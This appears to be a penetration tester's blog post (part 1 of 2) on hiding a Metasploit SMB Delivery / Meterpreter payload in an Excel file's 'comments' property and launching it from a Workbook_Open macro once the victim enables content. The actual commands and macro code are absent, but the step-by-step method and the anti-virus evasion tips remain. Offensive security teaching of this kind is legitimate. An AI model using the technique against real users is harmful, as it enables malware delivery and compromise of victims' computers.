0

Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)

 

As a penetration tester I’m always excited to see new and creative methods on creating weaponized MS Office documents.  This blog post builds on the following findings published by Black Hills InfoSec: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/

There are numerous ways on how MS Office documents can be abused and weaponised to deliver a variety of cyber-related attacks.  This blog post will demonstrate how quickly and easy it is to hide a Metasploit and Empire payload within a MS Office document and execute it from an embedded Macro.

Metasploit:

In the first example I’m going to use a payload generated with Metasploits ‘SMB Delivery’ functionality to Weaponise a MS Excel document.  The ‘SMB Delivery’ is a personal favourite of mine given its simplicity and subtle anti-virus evasion.

Begin by loading the relevant module into Metasploit:

 

 

 

 

Set the payload to anything you desire, in this example I’ll be using the Windows Meterpreter Reverse HTTPS payload:

 

 

 

Finally, issue the ‘exploit’ command to begin staging the attack:

 

Now, in order to utilise this, we will need execute the following command on the victim host:

 

 

Note: the folder path is randomly generated as we didn’t explicitly define it within the Metasploit options

In order to achieve this, we’re going to embed this command into a MS Excel document within the ‘comments’ property and execute it from an embedded Macro.  This can easily be done by using the Powershell script: ‘Commentator’ (https://github.com/clr2of8/Commentator)

 

Begin by starting PowerShell:

 

 

Import the module into your PowerShell environment:

 

 

And execute the script to embed our payload into the ‘comments’ property of the MS Excel document:

 

 

 

After successful execution, a copy of your existing MS Office file will be created with the payload embedded:

The new file with added comment has been written to .\msf_smb_delivery-wlc.xlsx.

DONE!

This can be verified by inspecting the file’s metadata / properties:

 

Lastly, in order to execute the payload embedded within the ‘comments’ property, the following embedded Macro can be used:

 

 

 

 

Note: In order to utilise auto-execution via the ‘Workbook_Open()’ function, the weaponised MS Excel document needed to be downgraded to Office 98 – 2003 compatibility (.xls)

After the victim has clicked ‘enable editing’ and ‘enable content’, a Meterpreter session should appear:

 

Kai Stimpson

Proud Parent, Senior Security Consultant, Weightlifter and Gardener.

Leave a Reply